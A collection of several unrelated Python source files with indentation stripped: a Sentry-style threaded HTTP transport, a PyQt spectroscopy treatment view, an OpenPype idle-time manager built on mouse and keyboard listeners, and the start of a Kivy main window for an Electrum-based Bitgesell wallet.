print("Sentry is attempting to send %s pending error messages" % size)
print("Waiting up to %s seconds" % timeout)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
self.stop(timeout=timeout)
def start(self):
"""
Starts the task thread.
"""
self._lock.acquire()
try:
if not self._thread:
self._thread = threading.Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
atexit.register(self.main_thread_terminated)
def stop(self, timeout=None):
"""
Stops the task thread. Synchronous!
"""
self._lock.acquire()
try:
if self._thread:
self._queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def queue(self, callback, *args, **kwargs):
self._queue.put_nowait((callback, args, kwargs))
def _target(self):
while 1:
record = self._queue.get()
if record is self._terminator:
break
callback, args, kwargs = record
try:
callback(*args, **kwargs)
except Exception:
logger.error('Failed processing job', exc_info=True)
time.sleep(0)
class ThreadedHTTPTransport(AsyncTransport, HTTPTransport):
scheme = ['threaded+http', 'threaded+https']
def __init__(self, parsed_url):
super(ThreadedHTTPTransport, self).__init__(parsed_url)
# remove the threaded+ from the protocol, as it is not a real protocol
self._url = self._url.split('+', 1)[-1]
def get_worker(self):
if not hasattr(self, '_worker'):
self._worker = AsyncWorker()
return self._worker
def send_sync(self, data, headers, success_cb, failure_cb):
try:
super(ThreadedHTTPTransport, self).send(data, headers)
except Exception as e:
failure_cb(e)
else:
success_cb()
def async_send(self, data, headers, success_cb, failure_cb):
self.get_worker().queue(self.send_sync, data, headers, success_cb,
failure_cb)
|
VD2Treatment.py
|
"""
Created on 01.04.2020
@author: saldenisov
"""
import logging
from _functools import partial
from PyQt5.QtWidgets import QMainWindow, QCheckBox, QLineEdit, QProgressBar
from devices.service_devices.project_treatment.openers import CriticalInfoHamamatsu
from datastructures.mes_independent.measurments_dataclass import Measurement, Cursors2D
from gui.views.ui import Ui_GraphVD2Window
from utilities.myfunc import info_msg
module_logger = logging.getLogger(__name__)
class VD2TreatmentView(QMainWindow):
def __init__(self, in_controller, parent=None):
super().__init__(parent)
self.controller = in_controller
self.name = f'VD2Treatment:view'
self.logger = logging.getLogger("VD2Treatment:view")
info_msg(self, 'INITIALIZING')
self.ui = Ui_GraphVD2Window()
self.ui.setupUi(self)
self.controller.model.add_measurement_observer(self)
self.controller.model.add_ui_observer(self)
self.controller.model.progressbar = self.ui.progressbar_calc
self.ui.data_slider.valueChanged.connect(self.controller.slider_map_selector_change)
self.ui.button_average_noise.clicked.connect(self.controller.average_noise)
self.ui.button_calc.clicked.connect(self.controller.calc_abs)
self.ui.button_left.clicked.connect(partial(self.map_step, -1))
self.ui.button_play.clicked.connect(self.button_play_maps)
self.ui.button_right.clicked.connect(partial(self.map_step, 1))
self.ui.button_save_result.clicked.connect(self.controller.save)
self.ui.button_set_data.clicked.connect(partial(self.controller.set_data, 'datastructures'))
self.ui.button_set_noise.clicked.connect(partial(self.controller.set_data, 'noise'))
self.ui.kinetics_slider.ValueChanged.connect(self.controller.slider_kinetics)
self.ui.spectrum_slider.ValueChanged.connect(self.controller.slider_spectra)
self.ui.lineedit_save_file_name.textChanged.connect(self.controller.save_file_path_changed)
self.ui.spinbox.valueChanged.connect(self.controller.spinbox_map_selector_change)
info_msg(self, 'INITIALIZED')
def map_step(self, dir: int):
value_now = int(self.ui.spinbox.value())
self.ui.spinbox.setValue(value_now + dir)
def f(self):
from time import sleep
for i in range(1,500):
self.ui.spinbox.setValue(i)
sleep(0.2)
def button_play_maps(self):
from threading import Thread
t = Thread(target=self.f)
t.start()
def fileQuit(self):
self.close()
def closeEvent(self, ce):
self.fileQuit()
def modelIsChanged_ui(self, ui: dict):
for name, value in ui.items():
widget = getattr(self.ui, name)
if isinstance(widget, QCheckBox):
widget.setChecked(value)
elif isinstance(widget, QLineEdit):
widget.setText(value)
elif isinstance(widget, QProgressBar):
widget.setValue(value[0] / value[1] * 100)
def modelIsChanged(self, measurement: Measurement, map_index: int, critical_info: CriticalInfoHamamatsu = None,
new=False, cursors: Cursors2D = None):
self.ui.spinbox.setValue(map_index)
self.ui.data_slider.setValue(map_index)
if new:
# datacanvas update
self.ui.data_slider.setMaximum(critical_info.number_maps-1)
self.ui.spinbox.setMaximum(critical_info.number_maps-1)
self.ui.datacanvas.new_data(measurement, cursors, map_index)
# kineticscanvas update
# kineticscanvas update
self.ui.kineticscanvas.new_data(measurement, cursors)
self.update_kinetics_slider(critical_info.timedelays_length - 1, cursors)
# spectrumcanvas update
self.ui.spectracanvas.new_data(measurement, cursors)
self.update_spectrum_slider(critical_info.wavelengths_length - 1, cursors)
else:
self.ui.datacanvas.update_data(measurement, cursors=cursors, map_index=map_index)
self.ui.kineticscanvas.update_data(measurement, cursors=cursors)
self.ui.spectracanvas.update_data(measurement, cursors=cursors)
if cursors:
self.ui.datacanvas.draw_cursors(cursors=cursors, draw=True)
self.ui.kineticscanvas.draw_cursors(cursors=cursors, draw=True)
self.ui.spectracanvas.draw_cursors(cursors=cursors, draw=True)
def update_kinetics_slider(self, maxValue: int, cursors: Cursors2D):
self.ui.kinetics_slider.setMax(maxValue)
self.ui.kinetics_slider.setStart(cursors.y1[0])
self.ui.kinetics_slider.setEnd(cursors.y2[0])
self.ui.kinetics_slider.update_Sliderpos()
def update_spectrum_slider(self, maxValue: int, cursors: Cursors2D):
self.ui.spectrum_slider.setMax(maxValue)
self.ui.spectrum_slider.setStart(cursors.x1[0])
self.ui.spectrum_slider.setEnd(cursors.x2[0])
self.ui.spectrum_slider.update_Sliderpos()
|
idle_threads.py
|
import time
import threading
from pynput import mouse, keyboard
from openpype.lib import PypeLogger
class MouseThread(mouse.Listener):
"""Listens user's mouse movement."""
def __init__(self, callback):
super(MouseThread, self).__init__(on_move=self.on_move)
self.callback = callback
def on_move(self, posx, posy):
self.callback()
class KeyboardThread(keyboard.Listener):
"""Listens user's keyboard input."""
def __init__(self, callback):
super(KeyboardThread, self).__init__(on_press=self.on_press)
self.callback = callback
def on_press(self, key):
self.callback()
class IdleManagerThread(threading.Thread):
def __init__(self, module, *args, **kwargs):
super(IdleManagerThread, self).__init__(*args, **kwargs)
self.log = PypeLogger.get_logger(self.__class__.__name__)
self.module = module
self.threads = []
self.is_running = False
self.idle_time = 0
def stop(self):
self.is_running = False
def reset_time(self):
self.idle_time = 0
@property
def time_callbacks(self):
return self.module.time_callbacks
def on_stop(self):
self.is_running = False
self.log.info("IdleManagerThread has stopped")
self.module.on_thread_stop()
def run(self):
self.log.info("IdleManagerThread has started")
self.is_running = True
thread_mouse = MouseThread(self.reset_time)
thread_keyboard = KeyboardThread(self.reset_time)
thread_mouse.start()
thread_keyboard.start()
try:
while self.is_running:
if self.idle_time in self.time_callbacks:
for callback in self.time_callbacks[self.idle_time]:
thread = threading.Thread(target=callback)
thread.start()
self.threads.append(thread)
for thread in tuple(self.threads):
if not thread.isAlive():
thread.join()
self.threads.remove(thread)
self.idle_time += 1
time.sleep(1)
except Exception:
self.log.warning(
'Idle Manager service has failed', exc_info=True
)
# Threads don't have their attrs when Qt application already finished
try:
thread_mouse.stop()
thread_mouse.join()
except AttributeError:
pass
try:
thread_keyboard.stop()
thread_keyboard.join()
except AttributeError:
pass
self.on_stop()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import PasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitgesell':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = req['status']
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, key):
self.show_info(_('Payment was sent'))
self._trigger_update_history()
def on_payment_failed(self, event, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._pincode_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitgesell import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitgesell:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitgesell: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
def on_success(x):
# save password in memory
self.password = x
self.load_wallet(wallet)
self.password_dialog(
basename = wallet.basename(),
check_password=wallet.check_password,
on_success=on_success,
on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
self.password = pw
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(
basename = storage.basename(),
check_password=storage.check_password,
on_success=on_password,
on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
#def lightning_open_channel_dialog(self):
# d = LightningOpenChannelDialog(self)
# d.open()
# def lightning_channels_dialog(self):
#@ if self._channels_dialog is None:
# self._channels_dialog = LightningChannelsDialog(self)
# self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.path = os.path.dirname(self.electrum_config.get_wallet_path())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/bitgesell-mini.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
